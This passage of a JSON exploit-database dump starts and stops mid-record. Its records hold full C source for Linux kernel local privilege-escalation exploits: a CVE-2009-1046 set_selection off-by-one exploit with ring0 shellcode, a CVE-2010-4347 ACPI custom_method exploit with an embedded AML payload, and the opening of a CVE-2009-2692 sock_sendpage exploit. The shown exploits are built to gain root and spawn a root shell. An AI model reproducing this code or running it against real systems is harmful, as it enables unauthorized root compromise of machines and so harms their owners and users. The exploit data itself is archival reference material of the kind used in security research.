&file.fu_list;\n\tfile.fu_list.next = &file.fu_list;\n\tfile.f_dentry = &dentry;\n\tfile.f_vfsmnt = &vfsmount;\n\tfile.f_op = &op;\n\n\tshmid_kernel.shm_perm.key = IPC_PRIVATE;\n\tshmid_kernel.shm_perm.uid = getuid();\n\tshmid_kernel.shm_perm.gid = getgid();\n\tshmid_kernel.shm_perm.cuid = getuid();\n\tshmid_kernel.shm_perm.cgid = getgid();\n\tshmid_kernel.shm_perm.mode = -1;\n\tshmid_kernel.shm_file = &file;\n}\n\nint\nmain(int argc, char **argv)\n{\n\tsetup();\n\ttrigger();\n\treturn 0;\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:27", "description": "\nLinux Kernel 2.6.24_16-232.6.27_7-102.6.28.3 (Ubuntu 8.048.10 Fedora Core 10 x86-64) - set_selection() UTF-8 Off-by-One Privilege Escalation", "cvss3": {}, "published": "2009-07-09T00:00:00", "type": "exploitpack", "title": "Linux Kernel 2.6.24_16-232.6.27_7-102.6.28.3 (Ubuntu 8.048.10 Fedora Core 10 x86-64) - set_selection() UTF-8 Off-by-One Privilege Escalation", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.7, "vectorString": "AV:L/AC:M/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-1046"], "modified": "2009-07-09T00:00:00", "id": "EXPLOITPACK:F46DE1A7490F12E98496831D3CD2C519", "href": "", "sourceData": "/* CVE-2009-1046 Virtual Console UTF-8 set_selection() off-by-one(two) Memory Corruption\n * Linux Kernel <= 2.6.28.3 \n *\n * coded by: sgrakkyu <at> antifork.org\n * http://kernelbof.blogspot.com/2009/07/even-when-one-byte-matters.html\n *\n * Dedicated to all people talking nonsense about non exploitability of kernel heap off-by-one overflow\n *\n * NOTE-1: you need a virtual console attached to the standard output (stdout) \n * - physical login\n * - ptrace() against some process with the same uid already attached to a VC\n * - remote management ..\n *\n * NOTE-2: UTF-8 character used is: U+253C - it seems to be supported in most standard console fonts\n * but if it's _not_: change it (and change respectively STREAM_ZERO and STREAM_ZERO_ALT defines)\n * If you use an unsupported character expect some sort of recursive fatal ooops:)\n *\n * Designed to be built as x86-64 binary only (SLUB ONLY)\n * SCTP stack has to be available\n * \n * Tested on target:\n * Ubuntu 8.04 x86_64 (2.6.24_16-23 generic/server)\n * Ubuntu 8.10 x86_64 (2.6.27_7-10 genric/server)\n * Fedora Core 10 x86_64 (default installed kernel - without selinux)\n *\n */\n\n\n#define _GNU_SOURCE\n#include <stdio.h>\n#include <sched.h>\n#include <errno.h>\n#include <netinet/in.h>\n#include <netinet/sctp.h>\n#include <arpa/inet.h>\n#include <sys/socket.h>\n#include <sys/types.h>\n#include <sys/ioctl.h>\n#include <stdlib.h>\n#include <string.h>\n#include <linux/tiocl.h>\n#include <sys/stat.h>\n#include <fcntl.h>\n#include <signal.h>\n#include <sys/mman.h>\n#include <sched.h>\n#include <unistd.h>\n#include <fcntl.h>\n\n#ifndef __x86_64__\n#error \"Architecture Unsupported\"\n#error \"This code was written for x86-64 target and has to be built as x86-64 binary\"\n#else\n\n#ifndef __u8\n#define __u8 uint8_t\n#endif\n#ifndef __u16\n#define __u16 uint16_t\n#endif\n#ifndef __u32\n#define __u32 uint32_t\n#endif\n#ifndef __u64 \n#define __u64 uint64_t\n#endif\n\n\n#define STREAM_ZERO 10\n#define STREAM_ZERO_ALT 12\n\n#define SCTP_STREAM 22\n#define STACK_SIZE 0x1000\n#define PAGE_SIZE 0x1000\n#define STRUCT_PAGE 0x0000000000000000\n#define STRUCT_PAGE_ALT 0x0000000100000000 \n#define CODE_PAGE 0x0000000000010000\n#define LOCALHOST \"127.0.0.1\"\n#define KMALLOC \"kmalloc-128\"\n#define TIMER_LIST_FOPS \"timer_list_fops\"\n\n#define __msg_f(format, args...) \\\n do { fprintf(stdout, format, ## args); } while(0)\n\n#define __msg(msg) \\\n do { fprintf(stdout, \"%s\", msg); } while(0)\n\n#define __fatal_errno(msg) \\\ndo { perror(msg); __free_stuff(); exit(1); } while(0)\n\n#define __fatal(msg) \\\ndo { fprintf(stderr, msg); __free_stuff(); exit(1); } while(0)\n\n\n\n#define CJUMP_OFF 13\nchar ring0[]=\n\"\\x57\" // push %rdi\n\"\\x50\" // push %rax\n\"\\x65\\x48\\x8b\\x3c\\x25\\x00\\x00\\x00\\x00\" // mov %gs:0x0,%rdi\n\"\\x48\\xb8\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\" // mov xxx, %rax\n\"\\xff\\xd0\" // callq *%rax\n\"\\x58\" // pop %rax\n\"\\x5f\" // pop %rdi\n\"\\xc3\"; // retq\n\n\n/* conn struct */\nstatic __u16 srvport;\nstruct sockaddr_in server_s;\nstatic struct sockaddr_in caddr;\n\n/* some fds.. */\nstatic int g_array[10];\nstatic int fd_zmap_srv=-1;\nstatic int kmalloc_fd=-1;\nstatic int unsafe_fd[4] = {-1,-1,-1,-1}; \n\n/* misc */\nstatic int dorec = 0, cankill=1, highpage=0;\nstatic char cstack[STACK_SIZE*2];\nstatic __u16 zstream=STREAM_ZERO;\nstatic __u32 uid,gid;\nstatic __u64 fops;\nstatic pid_t child=0;\nstatic char symbuf[20000];\n\nstatic void __free_stuff()\n{\n int i;\n for(i=3; i<2048; i++) \n {\n if((unsafe_fd[0] == i || unsafe_fd[1] == i || \n unsafe_fd[2] == i || unsafe_fd[3] == i))\n continue; \n\n close(i);\n }\n}\n\nstatic void bindcpu()\n{\n cpu_set_t set;\n CPU_ZERO(&set);\n CPU_SET(0, &set);\n \n if(sched_setaffinity(0, sizeof(cpu_set_t), &set) < 0)\n __fatal_errno(\"setaffinity\");\n}\n\n/* parse functions are not bof-free:) */\nstatic __u64 get_fops_addr()\n{\n FILE* stream;\n char fbuf[256];\n char addr[32];\n \n stream = fopen(\"/proc/kallsyms\", \"r\");\n if(stream < 0)\n __fatal_errno(\"open: kallsyms\");\n\n memset(fbuf, 0x00, sizeof(fbuf));\n while(fgets(fbuf, 256, stream) > 0)\n {\n char *p = fbuf;\n char *a = addr;\n memset(addr, 0x00, sizeof(addr));\n fbuf[strlen(fbuf)-1] = 0;\n while(*p != ' ')\n *a++ = *p++; \n p += 3;\n if(!strcmp(p, TIMER_LIST_FOPS))\n return strtoul(addr, NULL, 16); \n }\n\n return 0;\n}\n\nstatic int get_total_object(int fd)\n{\n char name[32];\n char used[32];\n char total[32];\n char *ptr[] = {name, used, total};\n int ret,i,toread=sizeof(symbuf)-1;\n char *p = symbuf;\n\n lseek(fd, 0, SEEK_SET);\n memset(symbuf, 0x00, sizeof(symbuf));\n while( (ret = read(fd, p, toread)) > 0)\n {\n p += ret; \n toread -= ret;\n }\n\n p = symbuf;\n do\n {\n for(i=0; i<sizeof(ptr)/sizeof(void*); i++)\n {\n char *d = ptr[i];\n while(*p != ' ')\n *d++ = *p++; \n *d = 0;\n while(*p == ' ')\n p++;\n }\n \n while(*p++ != '\\n');\n \n if(!strcmp(KMALLOC, name))\n return atoi(total); \n\n } while(*p != 0);\n return 0;\n}\n\n\nstatic void ring0c(void* t)\n{\n int i;\n __u32 *p = t;\n for(i=0; i<1100; i++,p++)\n {\n if(p[0] == uid && p[1] == uid && p[2] == uid && p[3] == uid &&\n p[4] == gid && p[5] == gid && p[6] == gid && p[7] == gid)\n {\n p[0] = p[1] = p[2] = p[3] = 0;\n p[4] = p[5] = p[6] = p[7] = 0;\n /* dont care about caps */\n break;\n }\n }\n}\n\n\nstatic int get_kmalloc_fd()\n{\n int fd;\n fd = open(\"/proc/slabinfo\", O_RDONLY);\n if(fd < 0)\n __fatal_errno(\"open: slabinfo\");\n return fd;\n}\n\n\nstatic int write_sctp(int fd, struct sockaddr_in *s, int channel)\n{\n int ret;\n ret = sctp_sendmsg(fd, \"a\", 1,\n (struct sockaddr *)s, sizeof(struct sockaddr_in),\n 0, 0, channel, 0 ,0);\n return ret;\n}\n\n\nstatic void set_sctp_sock_opt(int fd, __u16 in, __u16 out)\n{\n struct sctp_initmsg msg;\n int val=1;\n socklen_t len_sctp = sizeof(struct sctp_initmsg);\n getsockopt(fd, SOL_SCTP, SCTP_INITMSG, &msg, &len_sctp);\n msg.sinit_num_ostreams=out; \n msg.sinit_max_instreams=in;\n setsockopt(fd, SOL_SCTP, SCTP_INITMSG, &msg, len_sctp);\n setsockopt(fd, SOL_SCTP, SCTP_NODELAY, (char*)&val, sizeof(val));\n}\n\n\nstatic int create_and_init(void)\n{\n int fd = socket(PF_INET, SOCK_STREAM, IPPROTO_SCTP);\n if(fd < 0)\n __fatal_errno(\"socket: sctp\");\n set_sctp_sock_opt(fd, SCTP_STREAM, SCTP_STREAM);\n return fd;\n}\n\n\nstatic void connect_peer(int fd, struct sockaddr_in *s)\n{ \n int ret;\n ret = connect(fd, (struct sockaddr *)s, sizeof(struct sockaddr_in));\n if(ret < 0)\n __fatal_errno(\"connect: one peer\");\n}\n\n\nstatic void conn_and_write(int fd, struct sockaddr_in *s, __u16 stream)\n{\n connect_peer(fd,s);\n write_sctp(fd, s, stream);\n}\n\n\nstatic int clone_thread(void*useless)\n{\n int o = 1;\n int c=0,idx=0;\n int fd, ret;\n struct sockaddr_in tmp;\n socklen_t len;\n\n bindcpu();\n server_s.sin_family = PF_INET;\n server_s.sin_port = htons(srvport); \n server_s.sin_addr.s_addr = inet_addr(LOCALHOST);\n\n fd = socket(PF_INET, SOCK_STREAM, IPPROTO_SCTP);\n if(fd < 0)\n return -1;\n\n set_sctp_sock_opt(fd, SCTP_STREAM, SCTP_STREAM); \n setsockopt(fd, SOL_SOCKET, SO_REUSEADDR, (char *)&o, sizeof(o));\n\n ret = bind(fd, (struct sockaddr *)&server_s, sizeof(struct sockaddr_in));\n if(ret < 0)\n return -1;\n\n ret = listen(fd, 100);\n if(ret < 0)\n return -1;\n\n len = sizeof(struct sockaddr_in);\n while((ret = accept(fd, (struct sockaddr *)&tmp, &len)) >= 0)\n {\n if(dorec != 0 && c >= dorec && idx < 10)\n {\n g_array[idx] = ret;\n if(idx==9)\n {\n fd_zmap_srv = ret;\n caddr = tmp;\n break;\n }\n idx++;\n }\n c++; \n write_sctp(ret, &tmp, zstream);\n }\n \n sleep(1);\n return 0; \n}\n\n\nstatic int do_mmap(unsigned long base, int npages)\n{\n void*addr = mmap((void*)base, PAGE_SIZE*npages,\n PROT_READ|PROT_WRITE|PROT_EXEC, \n MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0);\n\n if(MAP_FAILED == addr)\n return -1;\n\n memset(addr, 0x00, PAGE_SIZE*npages);\n \n return 0;\n}\n\npid_t start_listener()\n{\n pid_t pid;\n pid = clone(clone_thread, cstack+STACK_SIZE-8, \n CLONE_VM|CLONE_FILES|SIGCHLD, NULL);\n \n return pid;\n} \n\nstatic void do_socks(struct sockaddr_in *s, __u16 stream)\n{\n int i,fd;\n int n_objs = get_total_object(kmalloc_fd), tmp_n_objs;\n int next=8;\n\n for(i=0; next != 0; i++)\n {\n fd = create_and_init();\n\n tmp_n_objs = get_total_object(kmalloc_fd); \n if(!dorec && tmp_n_objs != n_objs)\n dorec=i; \n\n conn_and_write(fd, s, stream);\n if(dorec)\n next--;\n }\n}\n\n\nstatic void clr(int fd)\n{\n /* use termcap instead..*/\n write(fd, \"\\33[H\\33[J\", 6); \n}\n\nstatic char tiobuffer[2048];\nvoid alloc_tioclinux()\n{\n int i;\n char out[128*3];\n /* Unicode Character 'BOX DRAWINGS LIGHT VERTICAL AND HORIZONTAL' (U+253C) */\n char utf8[3] = { 0xE2, 0x94, 0xBC }; \n //char utf8[3] = { 0xE2, 0x80, 0xBC }; \n struct tiocl_selection *sel;\n char *t;\n void *v = malloc(sizeof(struct tiocl_selection) + 1);\n t = (char*)v; \n sel = (struct tiocl_selection *)(t+1);\n memset(out, 0x41, sizeof(out)); \n for(i=0; i<128; i++) \n {\n tiobuffer[(i*3)]=utf8[0];\n tiobuffer[(i*3)+1]=utf8[1];\n tiobuffer[(i*3)+2]=utf8[2];\n }\n\n *t = TIOCL_SETSEL;\n sel->xs = 1;\n sel->ys = 1;\n sel->xe = 43;\n //sel->xe = 42; /* no overflow */\n sel->ye = 1;\n \n write(1, tiobuffer, sizeof(tiobuffer));\n if(ioctl(1, TIOCLINUX, v) < 0)\n __fatal(\"[!!] Unable to call TIOCLINUX ioctl(), need stdout to be on a virtual console\\n\");\n}\n\n\n\nstatic void migrate_evil_fd()\n{\n int i;\n pid_t child;\n\n __msg(\"[**] Migrate evil unsafe fds to child process..\\n\");\n child = fork();\n if(!child)\n {\n\n /* preserve evil fds */\n setsid(); \n if(!cankill) /* cant die .. */\n while(1)\n sleep(1);\n else\n {\n sleep(10); /* wait execve() before */ \n for(i=0; i<4; i++)\n close(unsafe_fd[i]); \n\n exit(1);\n }\n }\n else\n {\n if(!cankill)\n __msg_f(\"[**] Child process %d _MUST_ NOT die ... keep it alive:)\\n\", child);\n }\n}\n\n\nstatic void trigger_fault()\n{\n char *argv[]={\"/bin/sh\", NULL};\n int fd,i;\n\n fd = open(\"/proc/timer_list\", O_RDONLY);\n if(fd >= 0)\n {\n ioctl(fd, 0, 0);\n __free_stuff();\n migrate_evil_fd();\n \n for(i=0; i<4; i++)\n close(unsafe_fd[i]);\n\n if(!getuid())\n {\n __msg(\"[**] Got root!\\n\");\n execve(\"/bin/sh\", argv, NULL); \n }\n }\n else\n {\n __msg(\"[**] Cannot open /proc/timer_list\");\n __free_stuff();\n }\n}\n\n\n\nstatic void overwrite_fops( int sender, \n struct sockaddr_in *to_receiver,\n int receiver)\n{\n char *p = NULL;\n if(!highpage)\n p++;\n else\n p = (void*)STRUCT_PAGE_ALT;\n\n __u64 *uip = (__u64*)p; \n *uip = fops;\n write_sctp(sender, to_receiver, 1); \n sleep(1);\n trigger_fault();\n}\n\nstatic __u16 get_port()\n{\n __u16 r = (__u16)getpid();\n if(r <= 0x400)\n r+=0x400;\n return r;\n}\n\nint main(int argc, char *argv[])\n{\n int peerx, peery,i;\n __u64 *patch;\n\n srvport = get_port();\n\n uid=getuid();\n gid=getgid();\n fops=get_fops_addr() + 64; \n if(!fops)\n {\n __msg(\"[!!] Unable to locate symbols...\\n\");\n return 1;\n }\n\n __msg_f(\"[**] Patching ring0 shellcode with userspace addr: %p\\n\", ring0c);\n patch = (__u64*)(ring0 + CJUMP_OFF);\n *patch = (__u64)ring0c;\n\n __msg_f(\"[**] Using port: %d\\n\", srvport);\n __msg(\"[**] Getting slab info...\\n\");\n kmalloc_fd = get_kmalloc_fd();\n if(!get_total_object(kmalloc_fd)) \n __fatal(\"[!!] Only SLUB allocator supported\\n\");\n \n\n __msg(\"[**] Mapping Segments...\\n\"); \n __msg(\"[**] Trying mapping safe page...\");\n if(do_mmap(STRUCT_PAGE, 1) < 0)\n {\n __msg(\"Page Protection Present (Unable to Map Safe Page)\\n\");\n __msg(\"[**] Mapping High Address Page (dont kill placeholder child)\\n\");\n if(do_mmap(STRUCT_PAGE_ALT, 1) < 0)\n __fatal_errno(\"mmap\"); \n\n cankill=0; /* dont kill child owning unsafe fds.. */\n highpage=1; /* ssnmap in higher pages */\n zstream=STREAM_ZERO_ALT; \n } \n else\n __msg(\"Done\\n\");\n\n __msg(\"[**] Mapping Code Page... \");\n if(do_mmap(CODE_PAGE, 1) < 0)\n __fatal_errno(\"mmap\");\n else\n __msg(\"Done\\n\");\n\n memcpy((void*)CODE_PAGE, ring0, sizeof(ring0));\n\n __msg(\"[**] Binding on CPU 0\\n\"); \n bindcpu(); \n\n __msg(\"[**] Start Server Thread..\\n\");\n child = start_listener();\n sleep(3); \n \n do_socks(&server_s, zstream);\n for(i=0; i<7; i++)\n {\n close(g_array[8-1-i]); \n }\n clr(1); \n alloc_tioclinux(); // trigger overflow\n peerx = create_and_init();\n connect_peer(peerx, &server_s);\n peery = create_and_init();\n connect_peer(peery, &server_s);\n \n sleep(1);\n\n unsafe_fd[0] = peerx;\n unsafe_fd[1] = g_array[8];\n unsafe_fd[2] = peery;\n unsafe_fd[3] = g_array[9];\n \n __msg(\"\\n\"); \n __msg_f(\"[**] Umapped end-to-end fd: %d\\n\", fd_zmap_srv); \n __msg_f(\"[**] Unsafe fd: ( \");\n\n for(i=0; i<4; i++)\n __msg_f(\"%d \", unsafe_fd[i]);\n __msg(\")\\n\"); \n \n\n __msg(\"[**] Hijacking fops...\\n\");\n overwrite_fops(fd_zmap_srv, &caddr, peery);\n\n /* if u get here.. something nasty happens...may crash..*/\n __free_stuff();\n __msg(\"[**] Exploit failed.. freezing process\\n\");\n kill(getpid(), SIGSTOP);\n return 0;\n}\n\n#endif\n\n// milw0rm.com [2009-07-09]", "cvss": {"score": 4.7, "vector": "AV:L/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-04-01T19:04:26", "description": "\nLinux Kernel 2.6.37-rc2 - ACPI custom_method Local Privilege Escalation", "cvss3": {}, "published": "2010-12-18T00:00:00", "type": "exploitpack", "title": "Linux Kernel 2.6.37-rc2 - ACPI custom_method Local Privilege Escalation", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-4347"], "modified": "2010-12-18T00:00:00", "id": "EXPLOITPACK:37FE27A2B26DE14D6D6402EB9BCD0EA0", "href": "", "sourceData": "/*\n * american-sign-language.c\n *\n * Linux Kernel < 2.6.37-rc2 ACPI custom_method Privilege Escalation\n * Jon Oberheide <jon@oberheide.org>\n * http://jon.oberheide.org\n * \n * Information:\n *\n * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4347\n *\n * This custom_method file allows to inject custom ACPI methods into the ACPI\n * interpreter tables. This control file was introduced with world writeable\n * permissions in Linux Kernel 2.6.33.\n *\n * Usage:\n * \n * $ gcc american-sign-language.c -o american-sign-language\n * $ ./american-sign-language\n * [+] resolving required symbols...\n * [+] checking for world-writable custom_method...\n * [+] checking for an ACPI LID device...\n * [+] poisoning ACPI tables via custom_method...\n * [+] triggering ACPI payload via LID device...\n * [+] triggering exploit via futimesat...\n * [+] launching root shell!\n * # id\n * uid=0(root) gid=0(root) groups=0(root)\n *\n * Notes:\n *\n * This vuln allows us to write custom ACPI methods and load them into the\n * kernel as an unprivileged user. We compile some fancy ASL down to AML \n * that overrides the ACPI method used when the status of the LID device is \n * queried (eg. 'open' or 'closed' lid on a laptop). When the method is \n * triggered, it overlays an OperationRegion on the physical address where \n * sys_futimesat is located and overwrites the memory via the Store to \n * escalate privileges whenever sys_futimesat is called.\n *\n * The payload is 64-bit only and depends on the existence of a LID device\n * (eg. laptop), but the exploit will still tell you if you're vulnerable\n * regardless. If you don't know how to work around these limitations, you \n * probably shouldn't be running this in the first place. :-P\n *\n * Props to taviso, spender, kees, bliss, pipacs, twiz, stealth, and #brownpants\n */\n\n#include <stdio.h>\n#include <stdlib.h>\n#include <stdint.h>\n#include <string.h>\n#include <unistd.h>\n#include <errno.h>\n#include <fcntl.h>\n#include <limits.h>\n#include <inttypes.h>\n#include <sys/types.h>\n#include <sys/stat.h>\n#include <sys/utsname.h>\n\n/*\n * The ASL payload looks like:\n *\n * DefinitionBlock (\"lid.aml\", \"SSDT\", 2, \"\", \"\", 0x00001001) {\n * Method (\\_SB.LID._LID, 0, NotSerialized) {\n * OperationRegion (KMEM, SystemMemory, PHYADDR, 0x392)\n * Field(KMEM, AnyAcc, NoLock, Preserve) {\n * HACK, 0x392\n * }\n * Store (Buffer () {\n * 0x55, 0x48, 0x89, 0xe5, 0x53, 0x48, 0x83, 0xec,\n * 0x08, 0x48, 0xc7, 0xc3, 0x24, 0x24, 0x24, 0x24,\n * 0x48, 0xc7, 0xc0, 0x24, 0x24, 0x24, 0x24, 0xbf,\n * 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89,\n * 0xc7, 0xff, 0xd3, 0x48, 0xc7, 0xc0, 0xb7, 0xff,\n * 0xff, 0xff, 0x48, 0x83, 0xc4, 0x08, 0x5b, 0xc9,\n * 0xc3 }, HACK)\n * Return (One)\n * }\n * }\n * \n * Feel free to `iasl -d` this is you don't trust me! ;-)\n */\n#define PAYLOAD_AML \\\n\"\\x53\\x53\\x44\\x54\\x90\\x00\\x00\\x00\\x02\\x3e\\x00\\x00\\x00\\x00\\x00\\x00\" \\\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x10\\x00\\x00\\x49\\x4e\\x54\\x4c\" \\\n\"\\x21\\x05\\x09\\x20\\x14\\x4b\\x06\\x5c\\x2f\\x03\\x5f\\x53\\x42\\x5f\\x4c\\x49\" \\\n\"\\x44\\x5f\\x5f\\x4c\\x49\\x44\\x00\\x5b\\x80\\x4b\\x4d\\x45\\x4d\\x00\\x0c\\xe0\" \\\n\"\\x61\\x17\\x01\\x0b\\x92\\x03\\x5b\\x81\\x0c\\x4b\\x4d\\x45\\x4d\\x00\\x48\\x41\" \\\n\"\\x43\\x4b\\x42\\x39\\x70\\x11\\x34\\x0a\\x31\\x55\\x48\\x89\\xe5\\x53\\x48\\x83\" \\\n\"\\xec\\x08\\x48\\xc7\\xc3\\x24\\x24\\x24\\x24\\x48\\xc7\\xc0\\x24\\x24\\x24\\x24\" \\\n\"\\xbf\\x00\\x00\\x00\\x00\\xff\\xd0\\x48\\x89\\xc7\\xff\\xd3\\x48\\xc7\\xc0\\xb7\" \\\n\"\\xff\\xff\\xff\\x48\\x83\\xc4\\x08\\x5b\\xc9\\xc3\\x48\\x41\\x43\\x4b\\xa4\\x01\"\n#define PAYLOAD_LEN 144\n\n#define CUSTOM_METHOD \"/sys/kernel/debug/acpi/custom_method\"\n#define HEY_ITS_A_LID \"/proc/acpi/button/lid/LID/state\"\n\nunsigned long\nget_symbol(char *name)\n{\n\tFILE *f;\n\tunsigned long addr;\n\tchar dummy;\n\tchar sname[512];\n\tstruct utsname ver;\n\tint ret;\n\tint rep = 0;\n\tint oldstyle = 0;\n \n\tf = fopen(\"/proc/kallsyms\", \"r\");\n\tif (f == NULL) {\n\t\tf = fopen(\"/proc/ksyms\", \"r\");\n\t\tif (f == NULL)\n\t\t\tgoto fallback;\n\t\toldstyle = 1;\n\t}\n \nrepeat:\n\tret = 0;\n\twhile(ret != EOF) {\n\t\tif (!oldstyle)\n\t\t\tret = fscanf(f, \"%p %c %s\\n\", (void **)&addr, &dummy, sname);\n\t\telse {\n\t\t\tret = fscanf(f, \"%p %s\\n\", (void **)&addr, sname);\n\t\t\tif (ret == 2) {\n\t\t\t\tchar *p;\n\t\t\t\tif (strstr(sname, \"_O/\") || strstr(sname, \"_S.\"))\n\t\t\t\t\tcontinue;\n\t\t\t\tp = strrchr(sname, '_');\n\t\t\t\tif (p > ((char *)sname + 5) && !strncmp(p - 3, \"smp\", 3)) {\n\t\t\t\t\tp = p - 4;\n\t\t\t\t\twhile (p > (char *)sname && *(p - 1) == '_')\n\t\t\t\t\t\tp--;\n\t\t\t\t\t*p = '\\0';\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\tif (ret == 0) {\n\t\t\tfscanf(f, \"%s\\n\", sname);\n\t\t\tcontinue;\n\t\t}\n\t\tif (!strcmp(name, sname)) {\n\t\t\tfclose(f);\n\t\t\treturn addr;\n\t\t}\n\t}\n \n\tfclose(f);\n\tif (rep)\n\t\treturn 0;\nfallback:\n\tuname(&ver);\n\tif (strncmp(ver.release, \"2.6\", 3))\n\t\toldstyle = 1;\n\tsprintf(sname, \"/boot/System.map-%s\", ver.release);\n\tf = fopen(sname, \"r\");\n\tif (f == NULL)\n\t\treturn 0;\n\trep = 1;\n\tgoto repeat;\n}\n\nint\nmain(int argc, char **argv)\n{\n\tint ret;\n\tFILE *fp;\n\tchar buf[64];\n\tstruct stat sb;\n\tchar payload[PAYLOAD_LEN] = PAYLOAD_AML;\n\tunsigned long sys_futimesat, prepare_kernel_cred, commit_creds;\n\n\tprintf(\"[+] resolving required symbols...\\n\");\n\n\tsys_futimesat = get_symbol(\"sys_futimesat\");\n\tif (!sys_futimesat) {\n\t\tprintf(\"[-] sys_futimesat symbol not found, aborting!\\n\");\n\t\texit(1);\n\t}\n\n\tprepare_kernel_cred = get_symbol(\"prepare_kernel_cred\");\n\tif (!prepare_kernel_cred) {\n\t\tprintf(\"[-] prepare_kernel_cred symbol not found, aborting!\\n\");\n\t\texit(1);\n\t}\n\n\tcommit_creds = get_symbol(\"commit_creds\");\n\tif (!commit_creds) {\n\t\tprintf(\"[-] commit_creds symbol not found, aborting!\\n\");\n\t\texit(1);\n\t}\n\n\tprintf(\"[+] checking for world-writable custom_method...\\n\");\n\n\tret = stat(CUSTOM_METHOD, &sb);\n\tif (ret < 0) {\n\t\tprintf(\"[-] custom_method not found, kernel is not vulnerable!\\n\");\n\t\texit(1);\n\t}\n\n\tif (!(sb.st_mode & S_IWOTH)) {\n\t\tprintf(\"[-] custom_method not world-writable, kernel is not vulnerable!\\n\");\n\t\texit(1);\n\t}\n\n\tprintf(\"[+] checking for an ACPI LID device...\\n\");\n\n\tret = stat(HEY_ITS_A_LID, &sb);\n\tif (ret < 0) {\n\t\tprintf(\"[-] ACPI LID device not found, but kernel is still vulnerable!\\n\");\n\t\texit(1);\n\t}\n\n\tif (sizeof(sys_futimesat) != 8) {\n\t\tprintf(\"[-] payload is 64-bit only, but kernel is still vulnerable!\\n\");\n\t\texit(1);\n\t}\n\n\tsys_futimesat &= ~0xffffffff80000000;\n\tmemcpy(&payload[63], &sys_futimesat, 4);\n\tmemcpy(&payload[101], &commit_creds, 4);\n\tmemcpy(&payload[108], &prepare_kernel_cred, 4);\n\n\tprintf(\"[+] poisoning ACPI tables via custom_method...\\n\");\n\n\tfp = fopen(CUSTOM_METHOD, \"w\");\n\tfwrite(payload, 1, sizeof(payload), fp);\n\tfclose(fp);\n\n\tprintf(\"[+] triggering ACPI payload via LID device...\\n\");\n\n\tfp = fopen(HEY_ITS_A_LID, \"r\");\n\tfread(&buf, 1, sizeof(buf), fp);\n\tfclose(fp);\n\n\tprintf(\"[+] triggering exploit via futimesat...\\n\");\n\n\tret = futimesat(0, \"/tmp\", NULL);\n\n\tif (ret != -1 || errno != EDOTDOT) {\n\t\tprintf(\"[-] unexpected futimesat errno, exploit failed!\\n\");\n\t\texit(1);\n\t}\n\n\tif (getuid() != 0) {\n\t\tprintf(\"[-] privileges not escalated, exploit failed!\\n\");\n\t\texit(1);\n\t}\n\n\tprintf(\"[+] launching root shell!\\n\");\n\texecl(\"/bin/sh\", \"/bin/sh\", NULL);\n}", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:27", "description": "\nLinux Kernel 2.42.6 (RedHat Linux 9 Fedora Core 4 11 Whitebox 4 CentOS 4) - sock_sendpage() Ring0 Privilege Escalation (5)", "cvss3": {}, "published": "2009-08-24T00:00:00", "type": "exploitpack", "title": "Linux Kernel 2.42.6 (RedHat Linux 9 Fedora Core 4 11 Whitebox 4 CentOS 4) - sock_sendpage() Ring0 Privilege Escalation (5)", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-2692"], "modified": "2009-08-24T00:00:00", "id": "EXPLOITPACK:EC59CF0D0A8C58A6BA88DD9DDE82A311", "href": "", "sourceData": "/*\n**\n** 0x82-CVE-2009-2692\n** Linux kernel 2.4/2.6 (32bit) sock_sendpage() local ring0 root exploit (simple ver)\n** Tested RedHat Linux 9.0, Fedora core 4~11, Whitebox 4, CentOS 4.x.\n**\n** --\n** Discovered by Tavis Ormandy and Julien Tinnes of the Google Security Team.\n** spender and venglin's code is very excellent.\n** Thankful to them.\n**\n** Greets: Brad Spengler <spender(at)grsecurity(dot)net>,\n** Przemyslaw Frasunek <venglin(at)czuby(dot)pl>.\n** --\n** exploit by <p0c73n1(at)gmail(dot)com>.\n**\n** \"Slow and dirty exploit for this one\"\n**\n*/\n\n#include <stdio.h>\n#include <unistd.h>\n#include <sys/socket.h>\n#include <sys/mman.h>\n#include <fcntl.h>\n#include <sys/personality.h>\n\nunsigned int uid, gid;\n\nvoid kernel_code()\n{\n\tunsigned long where=0;\n\tunsigned long *pcb_task_struct;\n\n\twhere=(unsigned long )&where;\n\twhere&=~8191;\n\tpcb_task_struct=(unsigned long 